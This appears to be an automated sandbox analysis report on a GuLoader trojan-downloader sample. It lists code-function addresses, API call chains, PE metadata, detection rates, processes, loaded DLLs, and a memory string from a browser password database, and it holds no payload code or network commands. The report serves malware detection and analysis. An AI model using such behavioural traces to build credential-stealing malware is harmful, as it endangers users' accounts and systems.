Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B031818	7_2_3B031818
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B03FA20	7_2_3B03FA20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B036E27	7_2_3B036E27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B031828	7_2_3B031828
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B036E38	7_2_3B036E38
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B030040	7_2_3B030040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B035640	7_2_3B035640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B035650	7_2_3B035650
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B033E5A	7_2_3B033E5A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B033E68	7_2_3B033E68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B032670	7_2_3B032670
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B037C80	7_2_3B037C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B032680	7_2_3B032680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B030E87	7_2_3B030E87
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B037C90	7_2_3B037C90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B036497	7_2_3B036497
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B030E98	7_2_3B030E98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0364A8	7_2_3B0364A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B034CAF	7_2_3B034CAF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B03F0C0	7_2_3B03F0C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B034CC0	7_2_3B034CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0334C8	7_2_3B0334C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0334D8	7_2_3B0334D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B031CE1	7_2_3B031CE1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0372EF	7_2_3B0372EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B031CF0	7_2_3B031CF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0304F7	7_2_3B0304F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04E140	7_2_3B04E140
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B046760	7_2_3B046760
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B046A80	7_2_3B046A80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B041300	7_2_3B041300
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B044500	7_2_3B044500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B047700	7_2_3B047700
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04A900	7_2_3B04A900
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04DB00	7_2_3B04DB00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B042F0F	7_2_3B042F0F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B042F20	7_2_3B042F20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B046120	7_2_3B046120
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B049320	7_2_3B049320
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04C520	7_2_3B04C520
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B041940	7_2_3B041940
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B044B40	7_2_3B044B40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B047D40	7_2_3B047D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04AF40	7_2_3B04AF40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B040360	7_2_3B040360
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B043560	7_2_3B043560
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B049960	7_2_3B049960
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04CB60	7_2_3B04CB60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B048370	7_2_3B048370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B041F80	7_2_3B041F80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B045180	7_2_3B045180
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B048380	7_2_3B048380
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04B580	7_2_3B04B580
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0409A0	7_2_3B0409A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B043BA0	7_2_3B043BA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B046DA0	7_2_3B046DA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B049FA0	7_2_3B049FA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04D1A0	7_2_3B04D1A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0425C0	7_2_3B0425C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0457C0	7_2_3B0457C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0489C0	7_2_3B0489C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04BBC0	7_2_3B04BBC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B040FE0	7_2_3B040FE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0441E0	7_2_3B0441E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0473E0	7_2_3B0473E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04A5E0	7_2_3B04A5E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04D7E0	7_2_3B04D7E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B042BEF	7_2_3B042BEF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B042C00	7_2_3B042C00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B045E00	7_2_3B045E00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B049000	7_2_3B049000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04C200	7_2_3B04C200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B041620	7_2_3B041620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B044820	7_2_3B044820
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B047A20	7_2_3B047A20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04AC20	7_2_3B04AC20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04DE20	7_2_3B04DE20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B040040	7_2_3B040040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B043240	7_2_3B043240
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B046440	7_2_3B046440
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B049640	7_2_3B049640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04C840	7_2_3B04C840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B041C60	7_2_3B041C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B044E60	7_2_3B044E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B048060	7_2_3B048060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04B260	7_2_3B04B260
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B040680	7_2_3B040680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B043880	7_2_3B043880
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B049C80	7_2_3B049C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04CE80	7_2_3B04CE80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0422A0	7_2_3B0422A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0454A0	7_2_3B0454A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0486A0	7_2_3B0486A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04B8A0	7_2_3B04B8A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B040CC0	7_2_3B040CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B043EC0	7_2_3B043EC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0470C0	7_2_3B0470C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04A2C0	7_2_3B04A2C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04D4C0	7_2_3B04D4C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0428E0	7_2_3B0428E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B045AE0	7_2_3B045AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B048CE0	7_2_3B048CE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04BEE0	7_2_3B04BEE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B04A8F2	7_2_3B04A8F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0B5F90	7_2_3B0B5F90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0B4798	7_2_3B0B4798
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B0B5F80	7_2_3B0B5F80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B2E6322	7_2_3B2E6322
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B2E2668	7_2_3B2E2668
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B2EBB90	7_2_3B2EBB90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B2E2254	7_2_3B2E2254
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B2E52EA	7_2_3B2E52EA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B2E52F0	7_2_3B2E52F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Code function: String function: 00402A3A appears 52 times

Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000000.00000002.2370663238.0000000000436000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2934302224.0000000037AF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000000.2358410293.0000000000436000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/25@5/5

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004030D9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		7_2_004030D9

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Code function: 0_2_0040431C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040431C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

File created: C:\Users\user\Slutafregningers175

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

File created: C:\Users\user\AppData\Local\Temp\nsbD18F.tmp

Jump to behavior

Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2733933338.0000000038F26000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Virustotal: Detection: 22%
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	ReversingLabs: Detection: 16%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: textinputframework.dll	Jump to behavior
